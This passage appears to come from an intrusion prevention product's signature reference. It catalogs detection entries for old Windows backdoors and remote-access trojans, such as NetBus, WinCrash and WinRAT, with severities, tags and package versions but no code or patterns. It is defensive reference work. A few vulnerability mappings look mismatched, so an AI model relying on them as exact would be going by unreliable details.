BD-TCP_Net-Taxi-Response

About this situation: Net Taxi backdoor response detected
Context: TCP Server Stream Unknown
Severity: 7
Tags: Windows, Any Hardware, Net Taxi, Windows not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-11-1102
Last changed: sgpkg-ips-148-2032
Vulnerability: Backdoor-Net-Taxi
Description:
Back to top

BD-TCP_NetBus-Pro-Request

About this situation: NetBus Pro backdoor request
Context: TCP Client Stream Unknown
Severity: 7
Tags: Windows, Any Hardware, NetBus, Windows not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-9-1102
Last changed: sgpkg-ips-1405-5242
Vulnerability: Backdoor-NetBus-Pro
Description:
Back to top

BD-TCP_NetBus-Pro-Response

About this situation: NetBus Pro backdoor response
Context: TCP Server Stream Unknown
Severity: 7
Tags: Windows, Any Hardware, NetBus, Windows not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-8-1102
Last changed: sgpkg-ips-148-2032
Vulnerability: Backdoor-NetBus-Pro
Description:
Back to top

BD-TCP_NetBus-Response

About this situation: NetBus backdoor response
Context: TCP Server Stream Unknown
Severity: 10
Tags: Windows, Any Hardware, NetBus, Windows not specific, Successful Attacks, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-8-1102
Last changed: sgpkg-ips-325-4219
Vulnerability: Backdoor-NetBus
Description:
Back to top

BD-TCP_Netcontroller

About this situation: Netcontroller backdoor access
Context: TCP Client Stream Unknown
Severity: 7
Tags: Windows, Any Hardware, CVE1999, Windows not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-255-3038
Last changed: sgpkg-ips-255-3038
Vulnerability: Backdoor-Netcontroller
Description:
Back to top

BD-TCP_Netraider-Response

About this situation: Netraider backdoor response
Context: TCP Server Stream Unknown
Severity: 10
Tags: Windows, Any Hardware, Netraider, Windows not specific, Successful Attacks, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-9-1102
Last changed: sgpkg-ips-148-2032
Vulnerability: Backdoor-Netraider
Description:
Back to top

BD-TCP_NetSphere-Response

About this situation: NetSphere backdoor response
Context: TCP Server Stream Unknown
Severity: 10
Tags: Windows 95, Windows 98, Windows NT, Any Hardware, NetSphere, Windows NT not specific, Successful Attacks, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-8-1102
Last changed: sgpkg-ips-325-4219
Vulnerability: Backdoor-NetSphere
Description:
Back to top

BD-TCP_NetSpy-Response

About this situation: NetSpy backdoor response
Context: TCP Server Stream Unknown
Severity: 7
Tags: Windows 95, Windows 98, Any Hardware, NetSpy, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-8-1102
Last changed: sgpkg-ips-325-4219
Vulnerability: Backdoor-NetSpy
Description:
Back to top

BD-TCP_Network-Terrorist-Response

About this situation: Network Terrorist backdoor response
Context: TCP Server Stream Unknown
Severity: 10
Tags: Windows, Any Hardware, Network Terrorist, Windows not specific, Successful Attacks, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-8-1102
Last changed: sgpkg-ips-148-2032
Vulnerability: Backdoor-Network-Terrorist
Description:
Back to top

BD-TCP_New-Silencer-Response

About this situation: Detects New Silencer backdoor response
Context: TCP Server Stream Unknown
Severity: 7
Tags: Windows, Any Hardware, New Silencer, Windows not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-11-1102
Last changed: sgpkg-ips-148-2032
Vulnerability: Backdoor-New-Silencer
Description:
Back to top

BD-TCP_Nirvana

About this situation: Nirvana backdoor access
Context: TCP Client Stream Unknown
Severity: 7
Tags: Windows, Any Hardware, CVE1999, Windows not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-255-3038
Last changed: sgpkg-ips-255-3038
Vulnerability: Backdoor-Nirvana
Description:
Back to top

BD-TCP_NokNok-Response

About this situation: NokNok backdoor response detected
Context: TCP Server Stream Unknown
Severity: 10
Tags: Windows, Any Hardware, NokNok, Windows not specific, Successful Attacks, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-11-1102
Last changed: sgpkg-ips-148-2032
Vulnerability: Backdoor-NokNok
Description:
Back to top

BD-TCP_NoSecure

About this situation: NoSecure backdoor access
Context: TCP Client Stream Unknown
Severity: 10
Tags: Windows, Any Hardware, CVE1999, Windows not specific, Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-254-3038
Last changed: sgpkg-ips-254-3038
Vulnerability: Backdoor-NoSecure
Description:
Back to top

BD-TCP_Oblivion-Response

About this situation: Oblivion backdoor response
Context: TCP Server Stream Unknown
Severity: 10
Tags: Windows, Any Hardware, Oblivion, Windows not specific, Successful Attacks, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-8-1102
Last changed: sgpkg-ips-325-4219
Vulnerability: Backdoor-Oblivion
Description:
Back to top

BD-TCP_Oiris-Banner

About this situation: Oiris backdoor banner
Context: TCP Server Stream Unknown
Severity: 7
Tags: Windows, Any Hardware, CVE1999, Windows not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-254-3038
Last changed: sgpkg-ips-720-5211
Vulnerability: Backdoor-Olive
Description:
Back to top

BD-TCP_Olive-Response

About this situation: Oliver backdoor Response
Context: TCP Server Stream Unknown
Severity: 7
Tags: Windows, Any Hardware, CVE1999, Windows not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-254-3038
Last changed: sgpkg-ips-254-3038
Vulnerability: Backdoor-Olive
Description:
Back to top

BD-TCP_One-Response

About this situation: One backdoor response
Context: TCP Server Stream Unknown
Severity: 7
Tags: Windows, Any Hardware, CVE1999, Windows not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-8-1102
Last changed: sgpkg-ips-251-3038
Vulnerability: Backdoor-One
Backdoor-Bigorna
Description:
Back to top

BD-TCP_Optix-Pro-Response

About this situation: Optix Pro backdoor response
Context: TCP Server Stream Unknown
Severity: 10
Tags: Windows, Any Hardware, Optix-Pro, Windows not specific, Successful Attacks, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-8-1102
Last changed: sgpkg-ips-325-4219
Vulnerability: Backdoor-Optix-Pro
Description:
Back to top

BD-TCP_PC-Invader

About this situation: PC Invader backdoor access
Context: TCP Client Stream Unknown
Severity: 10
Tags: Windows, Any Hardware, CVE1999, Windows not specific, Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-253-3038
Last changed: sgpkg-ips-253-3038
Vulnerability: Backdoor-PC-Invader
Description:
Back to top

BD-TCP_PC-Invader-Banner

About this situation: PC Invader backdoor Banner
Context: TCP Server Stream Unknown
Severity: 7
Tags: Windows, Any Hardware, CVE1999, Windows not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-253-3038
Last changed: sgpkg-ips-253-3038
Vulnerability: Backdoor-PC-Invader
Description:
Back to top

BD-TCP_PC-OOTLT

About this situation: OOTLT backdoor access
Context: TCP Client Stream Unknown
Severity: 10
Tags: Windows, Any Hardware, CVE1999, Windows not specific, Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-254-3038
Last changed: sgpkg-ips-254-3038
Vulnerability: Backdoor-OOTLT
Description:
Back to top

BD-TCP_PC-Oxon

About this situation: Oxon backdoor access
Context: TCP Client Stream Unknown
Severity: 7
Tags: Windows, Any Hardware, CVE1999, Windows not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-253-3038
Last changed: sgpkg-ips-253-3038
Vulnerability: Backdoor-Oxon
Description:
Back to top

BD-TCP_Phase-Zero-Response

About this situation: Phase Zero backdoor response
Context: TCP Server Stream Unknown
Severity: 10
Tags: Windows 95, Windows 98, Windows NT, Any Hardware, Phase Zero, Windows NT not specific, Successful Attacks, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-9-1102
Last changed: sgpkg-ips-325-4219
Vulnerability: Backdoor-Phase-Zero
Description:
Back to top

BD-TCP_Phoenix-Response

About this situation: Phoenix backdoor response
Context: TCP Server Stream Unknown
Severity: 10
Tags: Windows, Any Hardware, Phoenix, Windows not specific, Successful Attacks, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-9-1102
Last changed: sgpkg-ips-325-4219
Vulnerability: Backdoor-Phoenix
Description:
Back to top

BD-TCP_PitFall-Response

About this situation: PitFall backdoor response
Context: TCP Server Stream Unknown
Severity: 10
Tags: Windows, Any Hardware, PitFall, Windows not specific, Successful Attacks, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-9-1102
Last changed: sgpkg-ips-325-4219
Vulnerability: Backdoor-PitFall
Description:
Back to top

BD-TCP_Pitfall-Surprise

About this situation: Pitfall Surprise backdoor access
Context: TCP Client Stream Unknown
Severity: 10
Tags: Windows, Any Hardware, CVE1999, Windows not specific, Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-253-3038
Last changed: sgpkg-ips-253-3038
Vulnerability: Backdoor-Pitfall-Surprise
Description:
Back to top

BD-TCP_Priority

About this situation: Priority backdoor access
Context: TCP Client Stream Unknown
Severity: 7
Tags: Windows, Any Hardware, CVE1999, Windows not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-253-3038
Last changed: sgpkg-ips-253-3038
Vulnerability: Backdoor-Priority
Description:
Back to top

BD-TCP_Private-Port

About this situation: Private Port backdoor access
Context: TCP Client Stream Unknown
Severity: 7
Tags: Windows, Any Hardware, CVE1999, Windows not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-253-3038
Last changed: sgpkg-ips-253-3038
Vulnerability: Backdoor-Private-Port
Description:
Back to top

BD-TCP_Progenic

About this situation: Progenic backdoor access
Context: TCP Client Stream Unknown
Severity: 7
Tags: Windows, Any Hardware, CVE1999, Windows not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-253-3038
Last changed: sgpkg-ips-253-3038
Vulnerability: Backdoor-Progenic
Description:
Back to top

BD-TCP_Project-Next-Response

About this situation: Project nEXT backdoor response
Context: TCP Server Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-9-1102
Last changed: sgpkg-ips-148-2032
Vulnerability: Backdoor-Project-Next
Description:
Back to top

BD-TCP_Prosiak-Response

About this situation: Prosiak backdoor response
Context: TCP Server Stream Unknown
Severity: 7
Tags: Windows, Any Hardware, Prosiak, Windows not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-9-1102
Last changed: sgpkg-ips-325-4219
Vulnerability: Backdoor-Prosiak
Description:
Back to top

BD-TCP_PsychWard-Response

About this situation: PsychWard backdoor response
Context: TCP Server Stream Unknown
Severity: 10
Tags: Windows, Any Hardware, PsychWard, Windows not specific, Successful Attacks, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-9-1102
Last changed: sgpkg-ips-325-4219
Vulnerability: Backdoor-PsychWard
Description:
Back to top

BD-TCP_Qwertos-RAT

About this situation: Qwertos RAT backdoor banner
Context: TCP Server Stream Unknown
Severity: 7
Tags: Windows, Any Hardware, CVE1999, Windows not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-253-3038
Last changed: sgpkg-ips-253-3038
Vulnerability: Backdoor-Qwertos-RAT
Description:
Back to top

BD-TCP_R0Xr4t-Response

About this situation: R0Xr4t backdoor response
Context: TCP Server Stream Unknown
Severity: 10
Tags: Windows, Any Hardware, R0Xr4t, Windows not specific, Successful Attacks, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-9-1102
Last changed: sgpkg-ips-148-2032
Vulnerability: Backdoor-R0Xr4t
Description:
Back to top

BD-TCP_R3CServer

About this situation: R3CServer backdoor banner
Context: TCP Server Stream Unknown
Severity: 7
Tags: Windows, Any Hardware, CVE1999, Windows not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-253-3038
Last changed: sgpkg-ips-253-3038
Vulnerability: Backdoor-R3CServer
Description:
Back to top

BD-TCP_RaTHeaD-Response

About this situation: RaTHeaD backdoor response
Context: TCP Server Stream Unknown
Severity: 10
Tags: Windows, Any Hardware, RaTHeaD, Windows not specific, Successful Attacks, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-9-1102
Last changed: sgpkg-ips-325-4219
Vulnerability: Backdoor-RaTHeaD
Description:
Back to top

BD-TCP_Remote-Explorer

About this situation: Remote Explorer backdoor access
Context: TCP Client Stream Unknown
Severity: 7
Tags: Windows, Any Hardware, CVE1999, Windows not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-252-3038
Last changed: sgpkg-ips-252-3038
Vulnerability: Backdoor-Glacier
Description:
Back to top

BD-TCP_Remote-Hack

About this situation: Remote Hack backdoor access
Context: TCP Client Stream Unknown
Severity: 10
Tags: Windows, Any Hardware, Remote Hack, Windows not specific, Successful Attacks, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-252-3038
Last changed: sgpkg-ips-252-3038
Vulnerability: Backdoor-Remote-Hack
Description:
Back to top

BD-TCP_Remote-Hack-Response

About this situation: Remote Hack backdoor response
Context: TCP Server Stream Unknown
Severity: 10
Tags: Windows, Any Hardware, Remote Hack, Windows not specific, Successful Attacks, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-9-1102
Last changed: sgpkg-ips-325-4219
Vulnerability: Backdoor-Remote-Hack
Description:
Back to top

BD-TCP_Remote-Process-Monitor-Response

About this situation: Remote Process Monitor backdoor response
Context: TCP Server Stream Unknown
Severity: 7
Tags: Windows, Any Hardware, Remote Process Monitor, Windows not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-9-1102
Last changed: sgpkg-ips-148-2032
Vulnerability: Backdoor-Remote-Process-Monitor
Description:
Back to top

BD-TCP_Remote-Revise

About this situation: Remote Revise backdoor request
Context: TCP Client Stream Unknown
Severity: 7
Tags: Windows, Any Hardware, CVE1999, Windows not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-251-3038
Last changed: sgpkg-ips-252-3038
Vulnerability: Backdoor-Remote-Revise
Description:
Back to top

BD-TCP_Ripperz-Controller

About this situation: Ripperz Controller backdoor response
Context: TCP Server Stream Unknown
Severity: 7
Tags: Windows, Any Hardware, CVE1999, Windows not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-251-3038
Last changed: sgpkg-ips-251-3038
Vulnerability: Backdoor-Ripperz-Controller
Description:
Back to top

BD-TCP_Ruler-Response

About this situation: Ruler backdoor response
Context: TCP Server Stream Unknown
Severity: 10
Tags: Windows, Any Hardware, Ruler, Windows not specific, Successful Attacks, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-9-1102
Last changed: sgpkg-ips-325-4219
Vulnerability: Backdoor-Ruler
Description:
Back to top

BD-TCP_RUX-The-Tick

About this situation: RUX The Tick backdoor request
Context: TCP Client Stream Unknown
Severity: 7
Tags: Windows, Any Hardware, CVE1999, Windows not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-250-3038
Last changed: sgpkg-ips-250-3038
Vulnerability: Backdoor-TransScout
Description:
Back to top

BD-TCP_Satans-Response

About this situation: Satans backdoor response
Context: TCP Server Stream Unknown
Severity: 10
Tags: Windows 95, Windows 98, Windows NT, Any Hardware, Satans, Windows NT not specific, Successful Attacks, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-9-1102
Last changed: sgpkg-ips-325-4219
Vulnerability: Backdoor-Satans
Description:
Back to top

BD-TCP_Scarab-Response

About this situation: Scarab backdoor response
Context: TCP Server Stream Unknown
Severity: 7
Tags: Windows, Any Hardware, Scarab, Windows not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-9-1102
Last changed: sgpkg-ips-148-2032
Vulnerability: Backdoor-Scarab
Description:
Back to top

BD-TCP_Schneckenkorn-Response

About this situation: Schneckenkorn backdoor response
Context: TCP Server Stream Unknown
Severity: 10
Tags: Windows, Any Hardware, Schneckenkorn, Windows not specific, Successful Attacks, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-9-1102
Last changed: sgpkg-ips-325-4219
Vulnerability: Backdoor-Schneckenkorn
Description:
Back to top

BD-TCP_Tcc-Trojan-Request

About this situation: Tcc Trojan backdoor request
Context: TCP Client Stream Unknown
Severity: 7
Tags: Windows, Any Hardware, CVE1999, Windows not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-250-3038
Last changed: sgpkg-ips-250-3038
Vulnerability: Backdoor-Tcc-Trojan
Description:
Back to top

BD-TCP_The-Prayer-Response

About this situation: The Prayer backdoor response
Context: TCP Server Stream Unknown
Severity: 10
Tags: Windows, Any Hardware, The Prayer, Windows not specific, Successful Attacks, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-9-1102
Last changed: sgpkg-ips-640-5211
Vulnerability: Backdoor-The-Prayer
Description:
Back to top

BD-TCP_The-Thing-Response

About this situation: The Thing backdoor response
Context: TCP Server Stream Unknown
Severity: 10
Tags: Windows, Any Hardware, The Thing, Windows not specific, Successful Attacks, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-9-1102
Last changed: sgpkg-ips-325-4219
Vulnerability: Backdoor-The-Thing
Description:
Back to top

BD-TCP_Total-Solar-Eclypse-Response

About this situation: Total Solar Eclypse backdoor response
Context: TCP Server Stream Unknown
Severity: 10
Tags: Windows 95, Windows 98, Any Hardware, Total Solar Eclypse, Successful Attacks, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-8-1102
Last changed: sgpkg-ips-325-4219
Vulnerability: Backdoor-Total-Solar-Eclypse
Description:
Back to top

BD-TCP_TransScout-Request

About this situation: TransScout backdoor request
Context: TCP Client Stream Unknown
Severity: 7
Tags: Windows, Any Hardware, CVE1999, Windows not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-250-3038
Last changed: sgpkg-ips-250-3038
Vulnerability: Backdoor-TransScout
Description:
Back to top

BD-TCP_Tron-Response

About this situation: Tron backdoor response detected
Context: TCP Server Stream Unknown
Severity: 10
Tags: Windows, Any Hardware, Tron, Windows not specific, Successful Attacks, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-11-1102
Last changed: sgpkg-ips-148-2032
Vulnerability: Backdoor-Tron
Description:
Back to top

BD-TCP_Ullysse-Request

About this situation: Backdoor.Win32.Uploader.10 backdoor request
Context: TCP Client Stream Unknown
Severity: 10
Tags: Windows, Any Hardware, Windows not specific, Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-250-3038
Last changed: sgpkg-ips-250-3038
Vulnerability: Backdoor-Ullysse
Description:
Back to top

BD-TCP_UltimateRAT-Request

About this situation: UltimateRAT backdoor request
Context: TCP Client Stream Unknown
Severity: 10
Tags: Windows, Any Hardware, Windows not specific, Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-250-3038
Last changed: sgpkg-ips-250-3038
Vulnerability: Backdoor-UltimateRAT
Description:
Back to top

BD-TCP_Ultors-Response

About this situation: Ultors backdoor response
Context: TCP Server Stream Unknown
Severity: 10
Tags: Windows 95, Windows 98, Any Hardware, Ultors, Successful Attacks, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-9-1102
Last changed: sgpkg-ips-325-4219
Vulnerability: Backdoor-Ultors
Description:
Back to top

BD-TCP_Undetected-Response

About this situation: Undetected backdoor response
Context: TCP Server Stream Unknown
Severity: 10
Tags: Windows, Any Hardware, Undetected, Windows not specific, Successful Attacks, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-11-1102
Last changed: sgpkg-ips-325-4219
Vulnerability: Backdoor-Undetected
Description:
Back to top

BD-TCP_Uploader-Request

About this situation: Backdoor.Win32.Uploader.10 backdoor request
Context: TCP Client Stream Unknown
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-250-3038
Last changed: sgpkg-ips-250-3038
Vulnerability: Backdoor-ValV-N.E.T
Description:
Back to top

BD-TCP_Vagr-Nocker-Response

About this situation: Vagr Nocker backdoor response
Context: TCP Server Stream Unknown
Severity: 10
Tags: Windows, Any Hardware, Vagr Nocker, Windows not specific, Successful Attacks, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-11-1102
Last changed: sgpkg-ips-325-4219
Vulnerability: Backdoor-Vagr-Nocker
Description:
Back to top

BD-TCP_ValV-N.E.T-Request

About this situation: Valv-N.E.T backdoor request
Context: TCP Client Stream Unknown
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-250-3038
Last changed: sgpkg-ips-250-3038
Vulnerability: Backdoor-ValV-N.E.T
Description:
Back to top

BD-TCP_Vampire-Response

About this situation: Vampire backdoor response
Context: TCP Server Stream Unknown
Severity: 7
Tags: Windows, Any Hardware, Vampire, Windows not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-11-1102
Last changed: sgpkg-ips-325-4219
Vulnerability: Backdoor-Vampire
Description:
Back to top

BD-TCP_Voodoo-Doll-Backdoor

About this situation: Voodoo Doll backdoor client connect
Context: TCP Client Stream Unknown
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-250-3038
Last changed: sgpkg-ips-250-3038
Vulnerability: Backdoor-Voodoo-Doll
Description:
Back to top

BD-TCP_War-Trojan

About this situation: War Trojan backdoor
Context: TCP Client Stream Unknown
Severity: 10
Tags: Windows, Any Hardware, Windows not specific, Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-250-3038
Last changed: sgpkg-ips-250-3038
Vulnerability: Backdoor-War-Trojan
Description:
Back to top

BD-TCP_Win-Mite-1.0-Reply

About this situation: Win Mite backdoor reply
Context: TCP Server Stream Unknown
Severity: 7
Tags: Windows, Any Hardware, Windows Mite, Windows not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-8-1102
Last changed: sgpkg-ips-148-2032
Vulnerability: Backdoor-Win-Mite-1
Description:
Back to top

BD-TCP_WinCrash-1.03-Banner

About this situation: WinCrash backdoor banner
Context: TCP Server Stream Unknown
Severity: 10
Tags: Windows, Any Hardware, WinCrash, Windows not specific, Successful Attacks, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-8-1102
Last changed: sgpkg-ips-148-2032
Vulnerability: Backdoor-WinCrash-1-03
Description:
Back to top

BD-TCP_WinCrash-1.03-Capslock

About this situation: WinCrash backdoor capslock
Context: TCP Client Stream Unknown
Severity: 10
Tags: Windows, Any Hardware, WinCrash, Windows not specific, Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-8-1102
Last changed: sgpkg-ips-148-2032
Vulnerability: Backdoor-WinCrash-1-03
Description:
Back to top

BD-TCP_WinCrash-2.0-Banner

About this situation: WinCrash backdoor banner
Context: TCP Server Stream Unknown
Severity: 10
Tags: Windows, Any Hardware, WinCrash, Windows not specific, Successful Attacks, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-8-1102
Last changed: sgpkg-ips-148-2032
Vulnerability: Backdoor-WinCrash-2-0
Description:
Back to top

BD-TCP_WinCrash-2.0-Connect

About this situation: WinCrash backdoor connect
Context: TCP Client Stream Unknown
Severity: 10
Tags: Windows, Any Hardware, WinCrash, Windows not specific, Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-8-1102
Last changed: sgpkg-ips-148-2032
Vulnerability: Backdoor-WinCrash-2-0
Description:
Back to top

BD-TCP_WinRAT-1.0-Client-Connect

About this situation: Backage backdoor client connect
Context: TCP Client Stream Unknown
Severity: 7
Tags: Windows, Any Hardware, WinRAT, Windows not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-8-1102
Last changed: sgpkg-ips-148-2032
Vulnerability: Backdoor-WinRAT-1
Description:
Back to top

BD-TCP_WinRAT-1.2-Client-Connect

About this situation: Backage backdoor client connect
Context: TCP Client Stream Unknown
Severity: 7
Tags: Windows, Any Hardware, WinRAT, Windows not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-8-1102
Last changed: sgpkg-ips-148-2032
Vulnerability: Backdoor-WinRAT-1-2
Description:
Back to top

BD-TCP_WinRAT-1.2-Taskbar

About this situation: Backage backdoor client taskbar
Context: TCP Client Stream Unknown
Severity: 7
Tags: Windows, Any Hardware, WinRAT, Windows not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-8-1102
Last changed: sgpkg-ips-148-2032
Vulnerability: Backdoor-WinRAT-1-2
Description:
Back to top

BD-TCP_WinRAT-1.2-Taskbar-Reply

About this situation: WinRAT backdoor taskbar reply
Context: TCP Server Stream Unknown
Severity: 10
Tags: Windows, Any Hardware, WinRAT, Windows not specific, Successful Attacks, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-8-1102
Last changed: sgpkg-ips-148-2032
Vulnerability: Backdoor-WinRAT-1-2
Description:
Back to top

BD-TCP_Xanadu-1.11-Client-Connect

About this situation: Backage backdoor client connect
Context: TCP Client Stream Unknown
Severity: 10
Tags: Windows, Any Hardware, Xanadu, Windows not specific, Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-8-1102
Last changed: sgpkg-ips-148-2032
Vulnerability: Backdoor-Xanadu-1-11
Description:
Back to top

BD-TCP_XLog-2.2-Connect

About this situation: BD Xlog 2.2 Connect
Context: TCP Client Stream Unknown
Severity: 7
Tags: Windows, Any Hardware, XLog, Windows not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-8-1102
Last changed: sgpkg-ips-148-2032
Vulnerability: Backdoor-XLog-2-2
